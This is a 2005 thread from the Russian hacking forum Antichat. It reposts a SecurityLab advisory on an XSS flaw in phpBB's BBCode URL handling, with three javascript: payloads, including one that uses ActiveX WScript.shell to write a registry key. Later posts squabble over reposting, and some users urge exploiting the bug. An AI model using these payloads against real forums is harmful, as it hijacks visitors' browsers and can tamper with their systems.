Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
phpBB < 2.0.15, BBCODE URL в phpBB |
06.06.2005, 22:04
|
|
Новичок
Регистрация: 06.03.2005
Сообщений: 16
Провел на форуме:
21674
Репутация:
2
|
|
phpBB < 2.0.15, BBCODE URL в phpBB
http://www.securitylab.ru/55012.html
http://www.securitylab.ru/55013.html
Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
Программа: phpBB версии до 2.0.15
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
[urЛ=javascript://%0ASh=alert(%22CouCou%22); window.close();]Alert box with "CouCou"[/urЛ]
[urЛ=javascript://%0ASh=new%20ActiveXObject (%22WScript.shell%22);Sh.regwrite(%22HKCU %5C%5CQQQQQ%5C%5Cqq%22,%22CouCou %22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/urЛ]
[urЛ=javascript://%0Awindow.opener.document.body. innerHTML=window.opener.document.body.innerHTML. replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27); window.close();]Modify opener page: Paul -> P.A.U.L[/urЛ]
URL производителя: www.phpbb.com
Решение: Установите последнюю версию (2.0.15) с сайта производителя.
Последний раз редактировалось karapuz; 06.06.2005 в 22:07..
|
|
|
06.06.2005, 22:25
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Так-с... любить Секлаба!!
Уже в 2-х местах оставил ссылки...
Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?
|
|
|
|
06.06.2005, 22:38
|
|
Новичок
Регистрация: 06.03.2005
Сообщений: 16
Провел на форуме:
21674
Репутация:
2
|
|
Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!!
вроде как ты и не модератор(админ, урцтой перец  ) что бы права качать.
а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует.
Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех"
p.s. вроде я понятно обьяснил... |
|
|
|
06.06.2005, 22:47
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
вроде бы понятно..
но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу.
А про авторитет - это уже не твоё дело =)
|
|
|
|
06.06.2005, 23:20
|
|
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649
Репутация:
67
|
|
сейчас опять обрушится серия ударов по phpBB =)
|
|
|
|
08.06.2005, 11:26
|
|
Новичок
Регистрация: 20.05.2005
Сообщений: 16
Провел на форуме:
1990
Репутация:
0
|
|
vo novoe sobitie.davaite sozdaite vidio kak lamanut forum.
pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat.
ocen bi xotelos posmatret
|
|
|
|
09.06.2005, 17:42
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
кто тебе это сделать мешает?
|
|
|
|
09.06.2005, 19:04
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
Нунафига с секлаба то
|
|
|
|
09.06.2005, 22:58
|
|
Познающий
Регистрация: 05.02.2005
Сообщений: 73
Провел на форуме:
46429
Репутация:
5
|
|
Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись.
Нужно делать конкуренцию!
|
|
|
|
10.06.2005, 10:11
|
|
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
Провел на форуме:
137630
Репутация:
11
|
|
чтоб посраться можно создать другой топик =)
давайте думайте как это использовать =))))))))))))))
ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
